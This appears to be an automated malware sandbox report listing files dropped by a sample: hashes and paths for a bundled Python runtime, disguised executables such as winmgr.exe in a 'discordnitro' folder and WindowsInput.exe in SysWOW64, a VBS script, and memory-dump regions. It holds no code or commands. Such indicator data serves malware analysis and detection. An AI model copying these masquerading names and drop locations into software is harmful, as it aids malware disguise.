f4f2116ea9397fecf3c02a43706ee6e7

SHA1
f31b77b893f1bce048e48b93f493b1eb729b6ad0

SHA256
4a0af9cf2265ec7799e02870f8eec6a01bc796a45d786b34c8b980014c4a1c69

SHA512
04d96cac6c2d2c03d83d3e5513850b08151387303708373c22faa2410404c2145dac1118539145bb1f2f2ad90e458c7af257ef89d1ec683bca91b4575814f365

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\PIL\_imaging.cp310-win_amd64.pyd

Filesize
955KB

MD5
f4f2116ea9397fecf3c02a43706ee6e7

SHA1
f31b77b893f1bce048e48b93f493b1eb729b6ad0

SHA256
4a0af9cf2265ec7799e02870f8eec6a01bc796a45d786b34c8b980014c4a1c69

SHA512
04d96cac6c2d2c03d83d3e5513850b08151387303708373c22faa2410404c2145dac1118539145bb1f2f2ad90e458c7af257ef89d1ec683bca91b4575814f365

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\VCRUNTIME140_1.dll

Filesize
36KB

MD5
135359d350f72ad4bf716b764d39e749

SHA1
2e59d9bbcce356f0fece56c9c4917a5cacec63d7

SHA256
34048abaa070ecc13b318cea31425f4ca3edd133d350318ac65259e6058c8b32

SHA512
cf23513d63ab2192c78cae98bd3fea67d933212b630be111fa7e03be3e92af38e247eb2d3804437fd0fda70fdc87916cd24cf1d3911e9f3bfb2cc4ab72b459ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\VCRUNTIME140_1.dll

Filesize
36KB

MD5
135359d350f72ad4bf716b764d39e749

SHA1
2e59d9bbcce356f0fece56c9c4917a5cacec63d7

SHA256
34048abaa070ecc13b318cea31425f4ca3edd133d350318ac65259e6058c8b32

SHA512
cf23513d63ab2192c78cae98bd3fea67d933212b630be111fa7e03be3e92af38e247eb2d3804437fd0fda70fdc87916cd24cf1d3911e9f3bfb2cc4ab72b459ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_bz2.pyd

Filesize
47KB

MD5
bf3679866df99540937628081af5537d

SHA1
bdbbd56b0fe20d3746aed33d89b4caeb08fc0a1f

SHA256
d0dd970620243dd87ae77db8a631a389b2cbeee216c7bee2b3425469a315618b

SHA512
34955168113c87750b91f4b794bed257b2215485b3abafb8b459b58599a3fc5381487a7f5157358336e7626501762765443b91ec117b949e7da91a3f9e56f682

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_bz2.pyd

Filesize
47KB

MD5
bf3679866df99540937628081af5537d

SHA1
bdbbd56b0fe20d3746aed33d89b4caeb08fc0a1f

SHA256
d0dd970620243dd87ae77db8a631a389b2cbeee216c7bee2b3425469a315618b

SHA512
34955168113c87750b91f4b794bed257b2215485b3abafb8b459b58599a3fc5381487a7f5157358336e7626501762765443b91ec117b949e7da91a3f9e56f682

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_hashlib.pyd

Filesize
33KB

MD5
05b06b9fdcf074e10f67e105588d713c

SHA1
0993bc372eb6b517bde9919d5f5a0bb9891945c5

SHA256
0d9d24dc4886321d68491db93921415c06871dc34de2ed91031de6fa369a1d93

SHA512
617752b8420e87b5ce3070238e18b24c9d4a2a7144a0070efbb068efc1ef98e0d8df15776fb644de57b554f89f887f96b6e7b09dda9278d3d32a0e81d5f1fa24

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_hashlib.pyd

Filesize
33KB

MD5
05b06b9fdcf074e10f67e105588d713c

SHA1
0993bc372eb6b517bde9919d5f5a0bb9891945c5

SHA256
0d9d24dc4886321d68491db93921415c06871dc34de2ed91031de6fa369a1d93

SHA512
617752b8420e87b5ce3070238e18b24c9d4a2a7144a0070efbb068efc1ef98e0d8df15776fb644de57b554f89f887f96b6e7b09dda9278d3d32a0e81d5f1fa24

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_lzma.pyd

Filesize
84KB

MD5
89c7f76c784854d62a8e516137d43607

SHA1
1dad4da521cd2ad1470aaa3a51aa4c004e77181e

SHA256
4612008b686994ab7bd4f384f6566a3a853d9a1c8935bfaa07eb595fdebd01a1

SHA512
bb83ac17a114665101446188279e7689e9661e18c5596c3a2e9625b72aeb748149db36bf96423c85f7ee448fd3ffeeeab6102ca7522ed1c4e3318d9c3bfc46e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_lzma.pyd

Filesize
84KB

MD5
89c7f76c784854d62a8e516137d43607

SHA1
1dad4da521cd2ad1470aaa3a51aa4c004e77181e

SHA256
4612008b686994ab7bd4f384f6566a3a853d9a1c8935bfaa07eb595fdebd01a1

SHA512
bb83ac17a114665101446188279e7689e9661e18c5596c3a2e9625b72aeb748149db36bf96423c85f7ee448fd3ffeeeab6102ca7522ed1c4e3318d9c3bfc46e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_queue.pyd

Filesize
24KB

MD5
5aafc702d526cd407a1c806a9e84f84a

SHA1
96ace17b3355dbfb9e81a913e058b2c815279e3f

SHA256
16b07e2496bd084845a2b41b6d98786a16c796a9eaba2f90046ec44be9338d78

SHA512
b610dd56d05b534ee1de45e1a0af66aba3076f5f9977622548ecbdd87d7c95fa562c4ad37cbf1e6ccae0e8dec2d0ea9f9b9c725f6d053ea388fe65e1c038c4d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_queue.pyd

Filesize
24KB

MD5
5aafc702d526cd407a1c806a9e84f84a

SHA1
96ace17b3355dbfb9e81a913e058b2c815279e3f

SHA256
16b07e2496bd084845a2b41b6d98786a16c796a9eaba2f90046ec44be9338d78

SHA512
b610dd56d05b534ee1de45e1a0af66aba3076f5f9977622548ecbdd87d7c95fa562c4ad37cbf1e6ccae0e8dec2d0ea9f9b9c725f6d053ea388fe65e1c038c4d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_socket.pyd

Filesize
41KB

MD5
10bddaab060fe231dd96b1c3859367a6

SHA1
44ae0c7f505158a044e9dfbd2283d8bb54d9a8ac

SHA256
d1eaea0b871e2b97a30a7ef7aefbe30c6d658598a994d707aedd7d59ee880e02

SHA512
acb03d9e2729b8643b4e14fb29c5e044ad55f342688b4203beb27420abd454ed4534eba14300b3db624e56921b787a76b787e91888a5257e133962878968d65d

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_socket.pyd

Filesize
41KB

MD5
10bddaab060fe231dd96b1c3859367a6

SHA1
44ae0c7f505158a044e9dfbd2283d8bb54d9a8ac

SHA256
d1eaea0b871e2b97a30a7ef7aefbe30c6d658598a994d707aedd7d59ee880e02

SHA512
acb03d9e2729b8643b4e14fb29c5e044ad55f342688b4203beb27420abd454ed4534eba14300b3db624e56921b787a76b787e91888a5257e133962878968d65d

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_ssl.pyd

Filesize
60KB

MD5
b1e9214217b06262bfc0e55247b5adc7

SHA1
4070a35c41e0e59216931bc06e94a8f2b5fd84fd

SHA256
34fd7be67093600009c73e010eef81dac32f1c560708a34b8cca382d94f759b2

SHA512
73463229ca3c3d137d24a7edff1601faf9a39ee15a5abb0b214dca2fb04ba9f9847b4e99ce19d9431feab0748fcc5671a5558ebaa4f4d950c17d7a9784c02ffc

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\_ssl.pyd

Filesize
60KB

MD5
b1e9214217b06262bfc0e55247b5adc7

SHA1
4070a35c41e0e59216931bc06e94a8f2b5fd84fd

SHA256
34fd7be67093600009c73e010eef81dac32f1c560708a34b8cca382d94f759b2

SHA512
73463229ca3c3d137d24a7edff1601faf9a39ee15a5abb0b214dca2fb04ba9f9847b4e99ce19d9431feab0748fcc5671a5558ebaa4f4d950c17d7a9784c02ffc

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\base_library.zip

Filesize
812KB

MD5
22ae93d5665578cdbed09bfa02c63648

SHA1
fa32b9dcfad5cacee03582e18762e6fc0f949875

SHA256
53afa83b6c48e7d641839c0967c5123dd2702d57c5c1dca9cf2850a94b12dd71

SHA512
8276c5f9d78bcd6be6f294279ab8d7dbe74407b7e13b9eb6076e54fa9619ad8057bf924c73fbb7b85f26a0faea532b239978d8f697cc3299aa0c881b31964415

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\config.json

Filesize
115B

MD5
e49cc7d820fd31423b93743b947cca72

SHA1
d02e44d8a66099b8be7157c1660d7b4546a8c46b

SHA256
d8b84f7b77b44d3c3948652cb424fe3ae62d4a09f32a0c34620e1ca4b23ebbb7

SHA512
24df684dd1276a58bcd68745e5210b7d6f4d716836f3ca2ad62851bf71989a5e5b3e110e69af7d8500287955e64e23f317de6d0ebb171905c8d1b8f30bdffd94

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\libcrypto-1_1.dll

Filesize
1.1MB

MD5
730ffd5fc87b96950c61d6f16c1d888a

SHA1
596802d785321bd9af39b083c10fc94ef18eef4e

SHA256
d3357cc31e9fda8afe230f49a35d61791c9e420b417e9929aac16d79c2a02b41

SHA512
5ca793e38e7023269deea9c54b15afca689fa85bd5e8e12903e36108b385270cde2f0c4801c2a360b88c7ce4a63234a3927f2e27d369e7c5cc5cc351184f191b

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\libcrypto-1_1.dll

Filesize
1.1MB

MD5
730ffd5fc87b96950c61d6f16c1d888a

SHA1
596802d785321bd9af39b083c10fc94ef18eef4e

SHA256
d3357cc31e9fda8afe230f49a35d61791c9e420b417e9929aac16d79c2a02b41

SHA512
5ca793e38e7023269deea9c54b15afca689fa85bd5e8e12903e36108b385270cde2f0c4801c2a360b88c7ce4a63234a3927f2e27d369e7c5cc5cc351184f191b

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\libcrypto-1_1.dll

Filesize
1.1MB

MD5
730ffd5fc87b96950c61d6f16c1d888a

SHA1
596802d785321bd9af39b083c10fc94ef18eef4e

SHA256
d3357cc31e9fda8afe230f49a35d61791c9e420b417e9929aac16d79c2a02b41

SHA512
5ca793e38e7023269deea9c54b15afca689fa85bd5e8e12903e36108b385270cde2f0c4801c2a360b88c7ce4a63234a3927f2e27d369e7c5cc5cc351184f191b

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\libssl-1_1.dll

Filesize
203KB

MD5
c222c1d04c4ccac9fe48408000b2a86e

SHA1
e71344c9f1f8c0441c8757df4f72af9354c122a1

SHA256
4f64cebd3d99810518e8f6fe2762bb11f1ea54c8128dd77d99f2a3fbcdc5d253

SHA512
a57333303c759be965d7c4b3fcd8f76f569eec5bb8d46071f122be28e21c8f302ad52c563f6260e671dc69eb7478b7817f0f08a3b2986fdff645f1dba55a402d

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\libssl-1_1.dll

Filesize
203KB

MD5
c222c1d04c4ccac9fe48408000b2a86e

SHA1
e71344c9f1f8c0441c8757df4f72af9354c122a1

SHA256
4f64cebd3d99810518e8f6fe2762bb11f1ea54c8128dd77d99f2a3fbcdc5d253

SHA512
a57333303c759be965d7c4b3fcd8f76f569eec5bb8d46071f122be28e21c8f302ad52c563f6260e671dc69eb7478b7817f0f08a3b2986fdff645f1dba55a402d

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\python310.dll

Filesize
1.5MB

MD5
e06ce8146da66871aa8aeedc950fd12b

SHA1
6ee749bdd0bc857a41ac8018c5553e895784b961

SHA256
aabd51782e4edb80561dd2ff065079a8381c7c86a6db1c6884bc09c73cde07a4

SHA512
0d8c16832d5242595eff4993a1563de09f1eba988ca6e9bcd9afdb0891a164ea2972ac9df40f575e8e1021d535c3b807ce025bc15788f08f84c71246d64f1198

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\python310.dll

Filesize
1.5MB

MD5
e06ce8146da66871aa8aeedc950fd12b

SHA1
6ee749bdd0bc857a41ac8018c5553e895784b961

SHA256
aabd51782e4edb80561dd2ff065079a8381c7c86a6db1c6884bc09c73cde07a4

SHA512
0d8c16832d5242595eff4993a1563de09f1eba988ca6e9bcd9afdb0891a164ea2972ac9df40f575e8e1021d535c3b807ce025bc15788f08f84c71246d64f1198

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\pywintypes310.dll

Filesize
64KB

MD5
097c852260ef0b780ddb498eab0671cd

SHA1
01b79721c9fd445f637fe0736d7806b19694b742

SHA256
4b3b80853ee96075eb10694efbbbe364273ec555e80c3b83d6791b06aa27598f

SHA512
6b0c5a35a16ad29b224ac25105b9c65bcba0a17fd558b6a552e33e2810fb7fda1eff6c99a0627e43adde164f7f45c714658c8ea82aa78fc17592782ad73b98bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\pywintypes310.dll

Filesize
64KB

MD5
097c852260ef0b780ddb498eab0671cd

SHA1
01b79721c9fd445f637fe0736d7806b19694b742

SHA256
4b3b80853ee96075eb10694efbbbe364273ec555e80c3b83d6791b06aa27598f

SHA512
6b0c5a35a16ad29b224ac25105b9c65bcba0a17fd558b6a552e33e2810fb7fda1eff6c99a0627e43adde164f7f45c714658c8ea82aa78fc17592782ad73b98bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\select.pyd

Filesize
24KB

MD5
7bb6ccfeb77e3b3c812271f3c57c7139

SHA1
d60ff5c903ef276823ab294f38295b24c4886e38

SHA256
1c035581c147204882a2ebeb2fee46f95c0cf738b889081bca8250b1739d7aa3

SHA512
b5bf030e08d3ddb1c90b8d236d0c40b485f5a26e34bddcbd23b96b08b142992712584645e9bf621263f6a75979c6bbf90aa7ec14d08248a285caa420f44d9c9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\select.pyd

Filesize
24KB

MD5
7bb6ccfeb77e3b3c812271f3c57c7139

SHA1
d60ff5c903ef276823ab294f38295b24c4886e38

SHA256
1c035581c147204882a2ebeb2fee46f95c0cf738b889081bca8250b1739d7aa3

SHA512
b5bf030e08d3ddb1c90b8d236d0c40b485f5a26e34bddcbd23b96b08b142992712584645e9bf621263f6a75979c6bbf90aa7ec14d08248a285caa420f44d9c9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\tinyaes.cp310-win_amd64.pyd

Filesize
21KB

MD5
5e29122bad14fb002d9e34c7659a8af9

SHA1
c2ac4019339856735f64421debd83d4beaf383e5

SHA256
87869f86ca6696e0daca8dbed3e5e738e79a519f695b058212a0e00567130f75

SHA512
c2c9b2fefeb9d910f1524b7c574000b02e596667a4b69834b962779cf7ff8778e2d3171ca9269cf85c7c4d1c83c14b6db7049041bf85f968da696731e8d5ff1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\tinyaes.cp310-win_amd64.pyd

Filesize
21KB

MD5
5e29122bad14fb002d9e34c7659a8af9

SHA1
c2ac4019339856735f64421debd83d4beaf383e5

SHA256
87869f86ca6696e0daca8dbed3e5e738e79a519f695b058212a0e00567130f75

SHA512
c2c9b2fefeb9d910f1524b7c574000b02e596667a4b69834b962779cf7ff8778e2d3171ca9269cf85c7c4d1c83c14b6db7049041bf85f968da696731e8d5ff1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\unicodedata.pyd

Filesize
288KB

MD5
e5eb50af2b8c78891b88b2b8140cacc3

SHA1
60ab7f97d18e20722fb66d9ae7458303ffb7e72e

SHA256
5796ec95560f9a7ea91ab9dee0e6cd3ff3c910745ab36ae8554c22319ac3c5b1

SHA512
153ac604e3803b47730892fcb65e68c4a232501488d47445c89b814a4fac99c04b1888ba0df8d378adfe2fac29a3593c899dfae5cf7f035ba95360bac0c944d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\unicodedata.pyd

Filesize
288KB

MD5
e5eb50af2b8c78891b88b2b8140cacc3

SHA1
60ab7f97d18e20722fb66d9ae7458303ffb7e72e

SHA256
5796ec95560f9a7ea91ab9dee0e6cd3ff3c910745ab36ae8554c22319ac3c5b1

SHA512
153ac604e3803b47730892fcb65e68c4a232501488d47445c89b814a4fac99c04b1888ba0df8d378adfe2fac29a3593c899dfae5cf7f035ba95360bac0c944d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\win32crypt.pyd

Filesize
51KB

MD5
82ba334401d02bd9df1cdb8609c4554c

SHA1
aa78f72338b0c1577ecda3f5b433b545cdd14d0e

SHA256
a2a705b40dfab7c679e5742ea022d354833824476f08fa9fd7c6db8cab00df66

SHA512
9cedf778e6855fdcb353276f61431e06cc27717e9299c2419f29d4d338866e25170e04b316e215b6397f79e7ef484e3e8704e5990db77be89bbf2803c0e1dce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\win32crypt.pyd

Filesize
51KB

MD5
82ba334401d02bd9df1cdb8609c4554c

SHA1
aa78f72338b0c1577ecda3f5b433b545cdd14d0e

SHA256
a2a705b40dfab7c679e5742ea022d354833824476f08fa9fd7c6db8cab00df66

SHA512
9cedf778e6855fdcb353276f61431e06cc27717e9299c2419f29d4d338866e25170e04b316e215b6397f79e7ef484e3e8704e5990db77be89bbf2803c0e1dce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\orc.exe

Filesize
916KB

MD5
ac0431f34683bcbbb2cf23aaf29ea8cf

SHA1
275ec0e362cb074d5f080aaa41c25a8ecebe3205

SHA256
1780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb

SHA512
156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\orc.exe

Filesize
916KB

MD5
ac0431f34683bcbbb2cf23aaf29ea8cf

SHA1
275ec0e362cb074d5f080aaa41c25a8ecebe3205

SHA256
1780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb

SHA512
156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCE70.vbs

Filesize
74KB

MD5
0c2a7204dd6c378451e6ca6985802a22

SHA1
a29982b623533bff6638053e27b9ed462196b82e

SHA256
536be654e06c9e81282d106ecd7aab29ad273fdbd7bdc62a2acfe919060614d2

SHA512
20273ddb38596ff9ac5cd3f1d057890cdb0a8b53b3a91bfb33d271c3dddaac8a4e9b5cb8dce634ad06a682c0f6c952a8b41c17ecb92b51e9d9dd39468ac6f5f8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe

Filesize
18KB

MD5
89ad448d079c97e6223bd48892a4c8b1

SHA1
c864447470fe553ccbb0574f8596200c72283145

SHA256
2ad50133104bbae5d82e85737296e39eecbfec15c270afd2a3b6aa981d53215f

SHA512
ad594497d29d3eebddc6ca56bc9cd5ae64fd5c27fb1087634e198e846cdaa92fa60043ee64d9712b45d8833d7485c64f7bfab3a1cdbb3bee0c8d02125d47562c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe

Filesize
18KB

MD5
89ad448d079c97e6223bd48892a4c8b1

SHA1
c864447470fe553ccbb0574f8596200c72283145

SHA256
2ad50133104bbae5d82e85737296e39eecbfec15c270afd2a3b6aa981d53215f

SHA512
ad594497d29d3eebddc6ca56bc9cd5ae64fd5c27fb1087634e198e846cdaa92fa60043ee64d9712b45d8833d7485c64f7bfab3a1cdbb3bee0c8d02125d47562c

Download Submit
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe

Filesize
967KB

MD5
b63bb68654e7be72058398809d6c4754

SHA1
4a7b43488029a2d4c960c9ee4431b99c8640a4b0

SHA256
8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

SHA512
c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

Download Submit
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe

Filesize
967KB

MD5
b63bb68654e7be72058398809d6c4754

SHA1
4a7b43488029a2d4c960c9ee4431b99c8640a4b0

SHA256
8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

SHA512
c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

Download Submit
C:\Users\Admin\Downloads\plage.exe

Filesize
967KB

MD5
b03ccade490854df220914c4430967e2

SHA1
1911a59e8c4b427d3fbc8fc9c794886bd2d81305

SHA256
81cb1fa3507209f360261e795cc68622c4163cbb0c6082dc7d8358a04492f961

SHA512
0c05ff99f2d2f448c431073b9a339e6dc1ccab43c9442be44edfd493c3d4d9bd604a0deb792b91295571817113c309bafc6d230b470a4874493561bd5aa9bc36

Download Submit
C:\Users\Admin\Downloads\plage.exe

Filesize
967KB

MD5
b03ccade490854df220914c4430967e2

SHA1
1911a59e8c4b427d3fbc8fc9c794886bd2d81305

SHA256
81cb1fa3507209f360261e795cc68622c4163cbb0c6082dc7d8358a04492f961

SHA512
0c05ff99f2d2f448c431073b9a339e6dc1ccab43c9442be44edfd493c3d4d9bd604a0deb792b91295571817113c309bafc6d230b470a4874493561bd5aa9bc36

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe

Filesize
21KB

MD5
e6fcf516d8ed8d0d4427f86e08d0d435

SHA1
c7691731583ab7890086635cb7f3e4c22ca5e409

SHA256
8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337

SHA512
c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe

Filesize
21KB

MD5
e6fcf516d8ed8d0d4427f86e08d0d435

SHA1
c7691731583ab7890086635cb7f3e4c22ca5e409

SHA256
8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337

SHA512
c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe.config

Filesize
357B

MD5
a2b76cea3a59fa9af5ea21ff68139c98

SHA1
35d76475e6a54c168f536e30206578babff58274

SHA256
f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

SHA512
b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFE4A.tmp

Filesize
676B

MD5
318109ac91b082f78f36813ce40670bb

SHA1
11af5ad80a74fb639fc9790100ba95b7dafa2513

SHA256
71ce0bba190b223b39c203fcc01f35a1c780536619c7a2cd2a1acac2f3b9b050

SHA512
3941853054ec2bf6b378f13b374df7184f2cd08deef49c2715c250018f6cac3f39edaa3c5c69fd492a5adc9247f3f8fbfd16d459b2b3dfb7b660b2588d77e723

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cms3rsmg.0.cs

Filesize
208KB

MD5
37a5609126b12b9615a683d86a4243af

SHA1
36cbfeb8188d64d1d0bbfb2b7abe95421a6b99ec

SHA256
c5fd7aa6f6092f3cefb0c89f83443297765c93d0874d35f9fdd3b91d93a1b9b4

SHA512
21175659c4e08615d01feed46054607e5960460ffaff68d33277bdc71b1990a4b2397e74e5100076804baeeb45c6ebb64bab58c6d65c78a4870a38562a06b170

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cms3rsmg.cmdline

Filesize
349B

MD5
5cf91db4354d5f7282c8c9352280d8fe

SHA1
728b61ce4e68e170fd6ff3d90dc2c12eed0e8d16

SHA256
399ce9544e74be2dd409ab383ebabbed00767b0a47e20568ccd1be6c830dbb9d

SHA512
a8582d38d69684afb16decb55ed864160160a00d05bfcdb970709173280ae87bb9bbe147f8fb4c8cb89a32ff68302800034b24f1d6f9b22d9778dd28b730618f

Download Submit
memory/480-253-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/480-252-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/480-251-0x000000001AD60000-0x000000001AD9C000-memory.dmp

Filesize
240KB

Download
memory/480-250-0x0000000000810000-0x0000000000822000-memory.dmp

Filesize
72KB

Download
memory/480-248-0x00000000001C0000-0x00000000001CC000-memory.dmp

Filesize
48KB

Download
memory/1264-178-0x00007FFD4F950000-0x00007FFD50386000-memory.dmp

Filesize
10.2MB

Download
memory/1748-134-0x0000018F78310000-0x0000018F78332000-memory.dmp

Filesize
136KB

Download
memory/1748-135-0x0000018F5F330000-0x0000018F5FDF1000-memory.dmp

Filesize
10.8MB

Download
memory/1748-136-0x0000018F5F330000-0x0000018F5FDF1000-memory.dmp

Filesize
10.8MB

Download
memory/2140-263-0x0000000000AC0000-0x0000000000AC8000-memory.dmp

Filesize
32KB

Download
memory/2904-249-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/2904-239-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/2992-268-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/2992-242-0x0000024C23CE0000-0x0000024C23D56000-memory.dmp

Filesize
472KB

Download
memory/2992-237-0x0000024C23AA0000-0x0000024C23AE4000-memory.dmp

Filesize
272KB

Download
memory/2992-228-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/3436-257-0x0000000000670000-0x000000000075A000-memory.dmp

Filesize
936KB

Download
memory/3436-259-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/3436-271-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/3440-224-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/3440-241-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/3760-272-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/3760-273-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/4888-132-0x00007FFD4F950000-0x00007FFD50386000-memory.dmp

Filesize
10.2MB

Download
memory/4940-262-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/4940-269-0x00007FFD4D190000-0x00007FFD4DC51000-memory.dmp

Filesize
10.8MB

Download
memory/4960-192-0x00007FFD52DA0000-0x00007FFD52DB9000-memory.dmp

Filesize
100KB

Download
memory/4960-197-0x00007FFD52D70000-0x00007FFD52D9E000-memory.dmp

Filesize
184KB

Download
memory/4960-208-0x00007FFD53380000-0x00007FFD5338D000-memory.dmp

Filesize
52KB

Download
memory/4960-210-0x00007FFD52D40000-0x00007FFD52D6D000-memory.dmp

Filesize
180KB

Download
memory/4960-214-0x00007FFD4E3A0000-0x00007FFD4E6C4000-memory.dmp

Filesize
3.1MB

Download
memory/4960-216-0x00007FFD528D0000-0x00007FFD528FB000-memory.dmp

Filesize
172KB

Download
memory/4960-207-0x00007FFD53390000-0x00007FFD533A4000-memory.dmp

Filesize
80KB

Download
memory/4960-238-0x00007FFD4A340000-0x00007FFD4A458000-memory.dmp

Filesize
1.1MB

Download
memory/4960-160-0x00007FFD4EA50000-0x00007FFD4EEBF000-memory.dmp

Filesize
4.4MB

Download
memory/4960-198-0x00007FFD52A00000-0x00007FFD52AB8000-memory.dmp

Filesize
736KB

Download
memory/4960-211-0x00007FFD52890000-0x00007FFD528C1000-memory.dmp

Filesize
196KB

Download
memory/4960-266-0x00007FFD4E6D0000-0x00007FFD4EA45000-memory.dmp

Filesize
3.5MB

Download
memory/4960-161-0x00007FFD53310000-0x00007FFD53323000-memory.dmp

Filesize
76KB

Download
memory/4960-258-0x00007FFD4EA50000-0x00007FFD4EEBF000-memory.dmp

Filesize
4.4MB

Download
